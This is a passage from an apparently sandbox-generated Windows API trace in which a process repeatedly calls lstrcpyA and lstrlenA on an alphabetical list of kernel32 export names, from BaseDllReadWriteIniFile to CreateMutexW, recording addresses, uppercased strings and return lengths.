returned="BaseDllReadWriteIniFile" [0181.051] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.052] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.052] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.052] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.052] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.052] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.052] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.052] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.052] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.052] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.052] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.052] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.052] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.052] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.052] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.052] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.052] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.052] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.052] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.052] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.052] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.053] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.053] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.053] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.053] lstrlenA (lpString="BEEP") returned 4 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.053] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.053] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.053] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.053] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.053] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.053] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.053] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.053] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.053] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.053] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.053] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.053] lstrlenA (lpString="CANCELIO") returned 8 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.053] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.053] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.053] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.053] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.054] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.054] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.054] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.054] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.054] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.054] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.054] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.054] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.054] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.054] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.054] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.054] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.054] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.054] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.054] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.054] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.054] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.054] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.054] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.054] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.055] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.055] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.055] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.055] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.055] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.055] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.055] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.055] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.055] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.055] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.055] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.055] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.055] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.055] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.055] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.055] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.055] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.055] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.055] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.055] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.056] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.056] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.056] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.056] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.056] lstrlenA (lpString="COPYFILEA") returned 9 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.056] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.056] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.056] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.056] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.056] lstrlenA (lpString="COPYFILEW") returned 9 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.056] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.056] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.056] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.056] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.056] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.056] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.056] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.056] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.056] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.056] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.057] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.057] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.057] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.057] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.057] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.057] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.057] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.057] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.057] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.057] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.057] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.057] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.057] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.057] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.057] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.057] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.057] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.057] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.057] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.058] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.058] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.058] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.058] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.058] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.058] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.058] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.058] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.058] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.058] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.058] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.058] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.058] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.058] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.058] lstrcpyA (in: lpString1=0x36fce30, 